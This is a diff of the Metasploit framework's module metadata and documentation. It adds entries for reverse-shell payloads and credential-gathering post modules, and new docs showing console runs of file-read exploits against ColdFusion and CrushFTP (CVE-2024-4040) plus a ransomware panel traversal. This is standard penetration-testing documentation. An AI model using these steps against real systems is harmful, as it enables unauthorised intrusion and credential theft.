+    "path": "/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/northstar_c2_xss_to_agent_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/novell_imanager_upload": {
    "name": "Novell iManager getMultiPartParameters Arbitrary File Upload",
    "fullname": "exploit/windows/http/novell_imanager_upload",
@@ -181954,7 +183547,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2024-03-12 14:09:22 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
    "path": "/modules/exploits/windows/mssql/mssql_payload.rb",
    "is_install_path": true,
    "ref_name": "windows/mssql/mssql_payload",
@@ -229855,7 +231448,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-05-21 12:52:12 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/exec",
@@ -230198,7 +231791,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2024-05-21 12:52:12 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/exec",
@@ -233505,6 +235098,42 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_osx/aarch64/exec": {
+    "name": "OSX aarch64 Execute Command",
+    "fullname": "payload/osx/aarch64/exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "alanfoster"
+    ],
+    "description": "Execute an arbitrary command",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-12-30 16:26:31 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/exec.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_osx/aarch64/meterpreter/reverse_tcp": {
    "name": "OSX Meterpreter, Reverse TCP Stager",
    "fullname": "payload/osx/aarch64/meterpreter/reverse_tcp",
@@ -233664,6 +235293,78 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_osx/aarch64/shell_bind_tcp": {
+    "name": "OS X x64 Shell Bind TCP",
+    "fullname": "payload/osx/aarch64/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "alanfoster"
+    ],
+    "description": "Bind an arbitrary command to an arbitrary port",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-02-01 01:05:40 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/shell_bind_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
+  "payload_osx/aarch64/shell_reverse_tcp": {
+    "name": "OSX aarch64 Shell Reverse TCP",
+    "fullname": "payload/osx/aarch64/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "alanfoster"
+    ],
+    "description": "Connect back to attacker and spawn a command shell",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-01-02 14:13:07 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/shell_reverse_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_osx/armle/execute/bind_tcp": {
    "name": "OS X Write and Execute Binary, Bind TCP Stager",
    "fullname": "payload/osx/armle/execute/bind_tcp",
@@ -250849,13 +252550,13 @@
    "references": [

    ],
-    "platform": "Linux",
+    "platform": "Linux,Unix",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-07-19 19:47:17 +0000",
+    "mod_time": "2024-04-26 21:58:43 +0000",
    "path": "/modules/post/linux/gather/checkcontainer.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/checkcontainer",
@@ -250863,6 +252564,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -257828,6 +259538,58 @@

    ]
  },
+  "post_windows/gather/credentials/adi_irc": {
+    "name": "Adi IRC credential gatherer",
+    "fullname": "post/windows/gather/credentials/adi_irc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on AdiIRC Client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 15:05:42 +0000",
+    "path": "/modules/post/windows/gather/credentials/adi_irc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/adi_irc",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
  "post_windows/gather/credentials/aim": {
    "name": "Aim credential gatherer",
    "fullname": "post/windows/gather/credentials/aim",
@@ -257957,6 +259719,58 @@

    ]
  },
+  "post_windows/gather/credentials/carotdav_ftp": {
+    "name": "CarotDAV credential gatherer",
+    "fullname": "post/windows/gather/credentials/carotdav_ftp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on CarotDAV FTP Client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 14:52:58 +0000",
+    "path": "/modules/post/windows/gather/credentials/carotdav_ftp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/carotdav_ftp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
  "post_windows/gather/credentials/chrome": {
    "name": "Chrome credential gatherer",
    "fullname": "post/windows/gather/credentials/chrome",
@@ -258824,6 +260638,58 @@

    ]
  },
+  "post_windows/gather/credentials/halloy_irc": {
+    "name": "Halloy IRC credential gatherer",
+    "fullname": "post/windows/gather/credentials/halloy_irc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on Halloy IRC Client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 14:07:48 +0000",
+    "path": "/modules/post/windows/gather/credentials/halloy_irc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/halloy_irc",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
  "post_windows/gather/credentials/heidisql": {
    "name": "Windows Gather HeidiSQL Saved Password Extraction",
    "fullname": "post/windows/gather/credentials/heidisql",
@@ -260111,6 +261977,58 @@

    ]
  },
+  "post_windows/gather/credentials/quassel_irc": {
+    "name": "Quassel IRC credential gatherer",
+    "fullname": "post/windows/gather/credentials/quassel_irc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on Quassel IRC Client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 15:09:51 +0000",
+    "path": "/modules/post/windows/gather/credentials/quassel_irc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/quassel_irc",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
  "post_windows/gather/credentials/razer_synapse": {
    "name": "Windows Gather Razer Synapse Password Extraction",
    "fullname": "post/windows/gather/credentials/razer_synapse",
@@ -260784,6 +262702,58 @@

    ]
  },
+  "post_windows/gather/credentials/sylpheed": {
+    "name": "Sylpheed email credential gatherer",
+    "fullname": "post/windows/gather/credentials/sylpheed",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Jacob Tierney",
+      "Kazuyoshi Maruta",
+      "Daniel Hallsworth",
+      "Barwar Salim M",
+      "Z. Cliffe Schreuders"
+    ],
+    "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n          Further details can be found in the module documentation.\n          This is a module that searches for credentials stored on Sylpheed email client in a windows remote host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-05-15 14:58:51 +0000",
+    "path": "/modules/post/windows/gather/credentials/sylpheed.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/sylpheed",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": [
+
+    ]
+  },
  "post_windows/gather/credentials/tango": {
    "name": "Tango credential gatherer",
    "fullname": "post/windows/gather/credentials/tango",
@@ -342,7 +342,7 @@ The result object now as a `.to_h` method which returns a hash compatible with o

 In the case of a success we build some info hashes and call `create_credential`. This is a method found in the metasploit-credential gem under `lib/metasploit/credential/creation.rb` in a mixin called `Metasploit::Credential::Creation`. This mixin is included in the Report mixin, so if your module includes that mixin you'll get these methods for free.

-`create_credential` creates a `Metasploit::Credential::Core`. We then take that core, the service data, and merge it with some additional data. This additional data includes the access level, the current time (to update last_attempted_at on the `Metasploit::Credential::Login`), the the status. 
+`create_credential` creates a `Metasploit::Credential::Core`. We then take that core, the service data, and merge it with some additional data. This additional data includes the access level, the current time (to update last_attempted_at on the `Metasploit::Credential::Login`), the status. 

 Finally, for a success, we output the result to the console.

@@ -70,3 +70,4 @@ Example:
 | FIRST_ATTEMPT_FAIL | The module may fail for the first attempt |
 | REPEATABLE_SESSION | The module is expected to get a session every time it runs |
 | UNRELIABLE_SESSION | The module isn't expected to get a shell reliably (such as only once) |
+| EVENT_DEPENDENT    | The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc |
@@ -202,13 +202,33 @@ git fetch upstream
 git checkout fixes-to-pr-12345 upstream/pr/12345
 ```

-If you're writing test cases (which you should), then make sure [rspec] works:
+## Running and writing tests
+
+If you're writing test cases (which you should), you should first configure your local database:

 ```bash
-rake spec
+bundle exec rake db:create db:migrate db:seed RAILS_ENV=test
 ```

-You should see over 9000 tests run, mostly resulting in green dots, a few in yellow stars, and no red errors.
+Then make sure [rspec] works:
+
+```bash
+bundle exec rspec
+```
+
+To run tests defined in file(s):
+
+```bash
+bundle exec rspec ./spec/path/to/your/tests_1.rb ./spec/path/to/your/tests_2.rb
+```
+
+To run run the tests defined at a line number - for instance line 23:
+
+```
+bundle exec rspec ./spec/path/to/your/tests_1.rb:23
+```
+
+Newly contributed tests should follow the conventions defined by [BetterSpecs.org] - with the additional requirement that all `it` blocks should have a human readable description.

 # Great!  Now what?

@@ -250,3 +270,5 @@ Finally, we welcome your feedback on this guide, so feel free to reach out to us
 [@kernelsmith]:https://github.com/kernelsmith
 [@corelanc0d3r]:https://github.com/corelanc0d3r
 [@ffmike]:https://github.com/ffmike
+
+[BetterSpecs.org]:https://www.betterspecs.org/
@@ -160,7 +160,7 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > run
 msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
 ```

-Now use the RBCD module to read the the current value of `msDS-AllowedToActOnBehalfOfOtherIdentity`:
+Now use the RBCD module to read the current value of `msDS-AllowedToActOnBehalfOfOtherIdentity`:

 ```msf
 msf6 auxiliary(admin/ldap/rbcd) > set USERNAME sandy@msflab.local
@@ -261,4 +261,4 @@ msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username
 [*] Certificate stored at: /home/user/.msf4/loot/20240404122240_default_20.92.148.129_windows.ad.cs_785877.pfx
 [+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 1107833b-0eb6-0477-a7c6-3590b326851a
 [*] Auxiliary module execution completed
-```
+```
@@ -60,14 +60,17 @@ msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > options

 Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   BASE_DN                    no        LDAP base DN if you already have it
-   NEW_PASSWORD               no        Password of admin user to add
-   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT     636              yes       The target port
-   SSL       true             no        Enable SSL on the LDAP connection
-   NEW_USERNAME               no        Username of admin user to add
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   BASE_DN                        no        LDAP base DN if you already have it
+   DOMAIN                         no        The domain to authenticate to
+   NEW_PASSWORD                   no        Password of admin user to add
+   NEW_USERNAME                   no        Username of admin user to add
+   PASSWORD                       no        The password to authenticate with
+   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT         636              yes       The target port
+   SSL           true             no        Enable SSL on the LDAP connection
+   USERNAME                       no        The username to authenticate with


 Auxiliary action:
@@ -0,0 +1,84 @@
+## Vulnerable Application
+
+This module reads or writes a Windows registry security descriptor remotely.
+
+In READ mode, the `FILE` option can be set to specify where the security
+descriptor should be written to.
+
+The following format is used:
+```
+key: <registry key>
+security_info: <security information>
+sd: <security descriptor as a hex string>
+```
+
+In WRITE mode, the `FILE` option can be used to specify the information needed
+to write the security descriptor to the remote registry. The file must follow
+the same format as described above.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/admin/registry_security_descriptor`
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> key=<registry key>`
+1. **Verify** the registry key security descriptor is displayed
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> key=<registry key> file=<file path>`
+1. **Verify** the registry key security descriptor is saved to the file
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> key=<registry key> action=write sd=<security descriptor as a hex string>`
+1. **Verify** the security descriptor is correctly set on the given registry key
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> file=<file path>`
+1. **Verify** the security descriptor taken from the file is correctly set on the given registry key
+
+## Options
+
+### KEY
+Registry key to read or write.
+
+### SD
+Security Descriptor to write as a hex string.
+
+### SECURITY_INFORMATION
+Security Information to read or write (see
+https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/23e75ca3-98fd-4396-84e5-86cd9d40d343
+(default: OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION).
+
+### FILE
+File path to store the security descriptor when reading or source file path used to write the security descriptor when writing
+
+
+## Scenarios
+
+### Read against Windows Server 2019
+
+```
+msf6 auxiliary(admin/registry_security_descriptor) > run verbose=true rhost=192.168.101.124 smbuser=Administrator smbpass=123456 action=READ key='HKLM\SECURITY\Policy\PolEKList'
+[*] Running module against 192.168.101.124
+
+[+] 192.168.101.124:445 - Raw security descriptor for HKLM\SECURITY\Policy\PolEKList: 01000480480000005800000000000000140000000200340002000000000214003f000f0001010000000000051200000000021800000006000102000000000005200000002002000001020000000000052000000020020000010100000000000512000000
+[*] Auxiliary module execution completed
+```
+
+### Write against Windows Server 2019
+Note that the information security has been set to 4 (DACL_SECURITY_INFORMATION) to avoid an access denied error.
+
+```
+msf6 auxiliary(admin/registry_security_descriptor) > run verbose=true rhost=192.168.101.124 smbuser=Administrator smbpass=123456 key='HKLM\SECURITY\Policy\PolEKList' action=WRITE sd=01000480480000005800000000000000140000000200340002000000000214003f000f0001010000000000051200000000021800000006000102000000000005200000002002000001020000000000052000000020020000010100000000000512000000 security_information=4
+[*] Running module against 192.168.101.124
+
+[+] 192.168.101.124:445 - Security descriptor set for HKLM\SECURITY\Policy\PolEKList
+[*] Auxiliary module execution completed
+```
+
+### Write against Windows Server 2019 (from file)
+
+```
+msf6 auxiliary(admin/registry_security_descriptor) > run verbose=true rhost=192.168.101.124 smbuser=Administrator smbpass=123456 action=WRITE file=/tmp/remote_registry_sd_backup.yml
+[*] Running module against 192.168.101.124
+
+[*] 192.168.101.124:445 - Getting security descriptor info from file /tmp/remote_registry_sd_backup.yml
+  key: HKLM\SECURITY\Policy\PolEKList
+  security information: 4
+  security descriptor: 01000480480000005800000000000000140000000200340002000000000214003f000f0001010000000000051200000000021800000006000102000000000005200000002002000001020000000000052000000020020000010100000000000512000000
+[+] 192.168.101.124:445 - Security descriptor set for HKLM\SECURITY\Policy\PolEKList
+[*] Auxiliary module execution completed
+```
@@ -26,7 +26,7 @@ Security bulletin from Squid: https://github.com/squid-cache/squid/security/advi

 ### REQUEST_COUNT

-REQUEST_COUNT is both the the number of HTTP requests which are sent to the server in
+REQUEST_COUNT is both the number of HTTP requests which are sent to the server in
 order to perform the actual Denial of Service (i.e. accepted requests by the server),
 and the number of requests that are sent to confirm that the Squid host is actually
 dead.
@@ -0,0 +1,59 @@
+## Vulnerable Application
+This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version
+'2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication
+token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that
+UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.
+
+### Setup
+
+#TODO: Find out how to setup a vulnerable target and put those details here.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use coldfusion_pms_servlet_file_read`
+1. Set the `RHOST` and datastore option
+1. If the target host is running Windows, change the default `FILE_PATH` datastore options from `/tmp/passwd` to a file path that exists on Windows.
+1. Run the module
+1. Receive the contents of the `FILE_PATH` file 
+
+## Scenarios
+### ColdFusion Version 2023.0.0.330468 running on Linux
+
+```
+msf6 auxiliary(gather/coldfusion_pms_servlet_file_read) > run
+[*] Reloading module...
+[*] Running module against 127.0.0.1
+
+[*] Attempting to retrieve UUID ...
+[+] UUID found: 1c49c29a-f1c0-4ed0-9f9e-215f434c8a12
+[*] Attempting to exploit directory traversal to read /etc/passwd
+[+] File content:
+n00tmeg:x:1000:1000:n00tmeg,,,:/home/n00tmeg:/bin/bash
+hplip:x:127:7:HPLIP system user,,,:/run/hplip:/bin/false
+pulse:x:125:132:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+colord:x:123:130:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+nm-openvpn:x:121:127:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+whoopsie:x:117:124::/nonexistent:/bin/false
+cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
+uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
+_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+
+[+] Results saved to: /Users/jheysel/.msf4/loot/20240403192500_default_127.0.0.1_coldfusion.file_475871.txt
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,81 @@
+## Vulnerable Application
+This module leverages an unauthenticated server-side template injection vulnerability in CrushFTP < 10.7.1 and
+< 11.1.0 (as well as legacy 9.x versions). Attackers can submit template injection payloads to the web API without
+authentication. When attacker payloads are reflected in the server's responses, the payloads are evaluated. The
+primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote
+code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).
+More information can be found in the [Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis).
+
+## Options
+
+### INJECTINTO
+The unauthenticated API function to use for template injection (default: zip).
+
+### STORE_LOOT
+Whether the read file's contents should be outputted to the console or stored as loot (default: false).
+
+### TARGETFILE
+The target file to read (default: users/MainUsers/groups.XML). This can be a full path, a relative path, or a network share path (if 
+firewalls permit). Files containing binary data may not be read accurately. Though file paths for Windows targets can contain `:` 
+characters, like `C:\Windows\win.ini`, this will result in payloads not being fully redacted from CrushFTP logs.
+
+## Testing
+To set up a test environment:
+1. Download an affected version of CrushFTP [here](https://github.com/the-emmons/CVE-2023-43177/releases/download/crushftp_software/CrushFTP10.zip) (SHA256: adc3619937ebb57b3a95c50f78fda5c388d072c0d34a317b9ed64a31127a6d3f).
+2. Configure `CRUSH_DIR` in `crushftp_init.sh` to point to the correct install directory.
+3. Execute `java -jar CrushFTP.jar` to show a local client GUI interface that can be used to set up an admin account.
+4. Execute `sudo crushftp_init.sh start` to launch the software on Linux or Mac. If on Windows, run `CrushFTP.exe` as an administrator.
+5. Follow the verification steps below.
+
+## Verification Steps
+1. Start msfconsole
+2. `use auxiliary/gather/crushftp_fileread_cve_2024_4040`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set TARGETFILE <TARGET_FILE_TO_READ>`
+6. `set STORE_LOOT false` if you want to display file on the console instead of storing it as loot.
+7. `run`
+
+## Scenarios
+### CrushFTP on Windows, Linux, or Mac
+```
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > show options 
+
+Module options (auxiliary/gather/crushftp_fileread_cve_2024_4040):
+
+   Name        Current Setting             Required  Description
+   ----        ---------------             --------  -----------
+   INJECTINTO  zip                         yes       The CrushFTP API function to inject into (Accepted: zip, exists)
+   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasp
+                                                     loit.html
+   RPORT       8080                        yes       The target port (TCP)
+   SSL         false                       no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT  false                       yes       Store the target file as loot
+   TARGETFILE  users/MainUsers/groups.XML  yes       The target file to read. This can be a full path, a relative path, or a network share path (i
+                                                     f firewalls permit). Files containing binary data may not be read accurately
+   TARGETURI   /                           yes       The URI path to CrushFTP
+   VHOST                                   no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > check
+[+] 127.0.0.1:8080 - The target is vulnerable. Server-side template injection successful!
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Server-side template injection successful!
+[*] Fetching anonymous session cookie...
+[*] Using template injection to read file: users/MainUsers/groups.XML
+[+] File read succeeded! 
+<?xml version="1.0" encoding="UTF-8"?>
+<groups type="properties"></groups>
+
+
+
+[*] Auxiliary module execution completed
+```
@@ -7,7 +7,7 @@ in the cluster, indices, and pull data from those indices.
 ### Docker

 Docker install is quite simple, however it won't come with any data making the results rather boring.
-However, we can use the the [oliver006/elasticsearch-test-data](https://github.com/oliver006/elasticsearch-test-data)
+However, we can use the [oliver006/elasticsearch-test-data](https://github.com/oliver006/elasticsearch-test-data)
 repo to help auto populate our data.

 ```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+The Jasmin Ransomware web server contains an unauthenticated directory traversal vulnerability
+within the download functionality. As of April 15, 2024 this was still unpatched, so all
+versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.
+
+### Install
+
+create a LAMP server (using php 8.2 worked for me, 7.2 did not).
+Run the following commands:
+
+```
+git clone https://github.com/codesiddhant/Jasmin-Ransomware.git
+cd Jasmin-Ransomware
+sudo cp -r Web\ Panel/* /var/www/html/
+sudo chown www-data:www-data /var/www/html/*
+sudo mysql -p
+```
+
+Execute the following SQL commands:
+
+```
+CREATE DATABASE jasmin_db;
+CREATE USER 'jasminadmin'@'localhost' IDENTIFIED BY '123456';
+GRANT ALL PRIVILEGES ON jasmin_db.* TO 'jasminadmin'@'localhost';
+Exit
+```
+
+Now setup the database:
+`sudo mysql -u jasminadmin -p123456 jasmin_db < Web\ Panel/database/jasmin_db.sql`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jasmin_ransomware_dir_traversal`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should get the content of a file if it exists.
